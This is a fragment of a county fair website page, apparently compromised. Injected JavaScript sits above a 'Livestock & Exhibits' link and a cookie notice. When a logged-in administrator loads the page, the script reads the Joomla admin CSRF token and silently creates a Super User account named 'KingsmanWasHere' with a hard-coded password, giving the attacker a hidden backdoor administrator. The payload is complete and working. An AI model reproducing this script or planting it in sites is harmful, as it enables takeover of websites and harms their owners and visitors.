(function(){
var base = 'https://www.putnamcountyfair.com';
var u = 'KingsmanWasHere';
var p = 'Attackerp@ss234';
var e = '';
fetch(base+'/administrator/index.php?option=com_users&view=user&layout=edit&id=0',{credentials:'include'})
.then(r=>r.text())
.then(html=>{
var m = html.match(/name="([a-f0-9]{32})"/);
if(!m) return;
var token = m[1];
var fd = new FormData();
fd.append('jform[name]', u);
fd.append('jform[username]', u);
fd.append('jform[password]', p);
fd.append('jform[password2]', p);
fd.append('jform[email]', e);
fd.append('jform[block]', '0');
fd.append('jform[groups][]', '8');
fd.append('task', 'user.save');
fd.append(token, '1');
return fetch(base+'/administrator/index.php?option=com_users&task=user.save',{
method:'POST', credentials:'include', body:fd
});
});
})();
">Livestock & Exhibits
We use cookies to ensure that we give you the best experience possible on our website. By continuing to use our website you are accepting the use of cookies on our website.